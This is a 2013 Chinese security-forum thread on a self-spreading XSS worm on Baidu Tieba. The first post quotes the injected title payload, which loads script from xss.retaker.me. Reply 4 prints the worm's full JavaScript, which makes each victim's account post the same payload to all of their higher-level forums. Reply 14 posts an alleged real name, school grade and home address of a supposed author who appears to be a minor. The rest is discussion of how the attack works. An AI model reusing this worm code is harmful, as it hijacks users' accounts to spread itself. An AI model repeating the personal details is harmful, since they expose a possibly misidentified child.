当前位置:WooYun(白帽子技术社区) >> xss >> 在贴吧被csrf了

在贴吧被csrf了

liyang (<script>alert("xss")</script>) | 2013-05-19 17:31

Unnamed QQ Screenshot20130519172904.png

点进来有..",a:$.getScript('//xss.retaker.me/1.js'),a:"

题目都是这样的


本来以为是某个人测试的呢  点开想回复一个  我的cookies到你那了么

结果就发现自己的账号也发出了相似的帖子。。。

分享到:
22 个回复
  1. 1#
    回复此人 感谢
    穿精带淫 | 2013-05-19 17:32

    看到了,很多贴吧都有这帖.

  2. 2#
    回复此人 感谢
    momo | 2013-05-19 17:33

    1111

  3. 3#
    回复此人 感谢
    书生 | 2013-05-19 17:34

    我勒个去,“我喜欢的贴吧”都会转发这条信息

  4. 4#
    回复此人 感谢
    erevus | 2013-05-19 17:46

    var forumName = [];



    var forumId = [];



    for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) {



      if (PageData.user.user_forum_list.info[i].user_level > 3) {



        if (PageData.user.user_forum_list.info[i].forum_name!="璐村惂鐩戞帶") {



          forumName[j] = PageData.user.user_forum_list.info[i].forum_name;



          forumId[j] = PageData.user.user_forum_list.info[i].id;



          j++;



        }



      }



    }







    function madeit(myKw, myFid) {



      var c = rich_postor._getData();



      c.content="\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01";



      c.ftid = c.fid;



      c.ptid = "2337372175";



      c.title = '\\u70b9\\u8fdb\\u6765\\u6709..",a:$.getScript(\\'//xss.retaker.me/1.js\\'),a:"';



      c.fid = myFid;



      c.kw = myKw;



      $.post("/relay/commit", c);



    }



    //now begin!



    for (j = 0; j < forumName.length; j++) {



      setTimeout("madeit('" + forumName[j] + "','" + forumId[j] + "')", 1500 * j);



    }

  5. 5#
    回复此人 感谢
    z7y (小胖子首席鉴黄师) | 2013-05-19 18:03

    哈哈哈哈哈,好玩儿~

  6. 6#
    回复此人 感谢
    呆子不开口 (求各种兼职) | 2013-05-19 18:14

    为何说是csrf

  7. 7#
    回复此人 感谢
    liyang (<script>alert("xss")</script>) | 2013-05-19 18:16

    @呆子不开口 要不是什么啊~~

  8. 8#
    回复此人 感谢
    asdf (import pdb;pdb.set_trace(); name="signature" type="text" maxlength="25") | 2013-05-19 19:57

    DOM XSS WORM http://weibo.com/1652595727/zxsFJ60bn
    csrf方式来提交表单而已,但应该认为是XSS

  9. 9#
    回复此人 感谢
    liyang (<script>alert("xss")</script>) | 2013-05-19 20:24

    @asdf 额~~我是菜鸟~~我一直认为的是xss和csrf是一类的 怎么区分呢~~xss只是窃取用户cookies等,而csrf是借助用户权限干别的事情~~

  10. 10#
    回复此人 感谢
    猥琐 (http://blog.twodong.com) | 2013-05-19 20:39

    因为这个好多人被封了

  11. 11#
    回复此人 感谢
    海盗湾V | 2013-05-19 20:47

    乌云白帽子干的http://www.wooyun.org/whitehats/retaker

  12. 12#
    回复此人 感谢
    liyang (<script>alert("xss")</script>) | 2013-05-19 20:53

    @海盗湾V 我在网上搜了搜他百度账号 面包虫007  貌似之前也干过这事http://tieba.baidu.com/p/2204216052

  13. 13# 感谢(1)
    回复此人 感谢
    梧桐雨 (‮ofni.uygnotuw‮) | 2013-05-19 20:57

    @liyang csrf和xss是不一样的。虽然都属于前端hack

  14. 14#
    回复此人 感谢
    海盗湾V | 2013-05-19 21:27

    @liyang 面包虫007 ,真实姓名:王竟宇
    年级,初一 地址:济南章丘双山小区4栋17号
    真的假的?

  15. 15#
    回复此人 感谢
    erevus | 2013-05-19 23:00

    @海盗湾V 不是他首发的

  16. 16#
    回复此人 感谢
    retaker | 2013-05-20 08:47

    @dtc 求解救………………

  17. 17#
    回复此人 感谢
    retaker | 2013-05-20 08:49

    @海盗湾V 当然是假的

  18. 18#
    回复此人 感谢
    齐迹 (sec.zhubajie.com 欢迎来撸) | 2013-05-20 08:56

    LZ 你的马赛克为什么不全打呢?

  19. 19#
    回复此人 感谢
    liyang (<script>alert("xss")</script>) | 2013-05-20 11:21

    @齐迹 那其实就是我的账号,有哪里漏了么~

  20. 20#
    回复此人 感谢
    半世倾尘 | 2013-05-20 12:19

    比较牛逼

  21. 21#
    回复此人 感谢
    null (生活不会像你想象得那么好,也不会像你想象得那么糟。) | 2013-05-20 18:00

    这个虫子的行为是:一个用户中招后,就会在所有该用户收藏的贴吧中发帖。

  22. 22#
    回复此人 感谢
    冉冉升起 (....ing) | 2013-05-24 21:47

    看不来csrf想学啊!

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1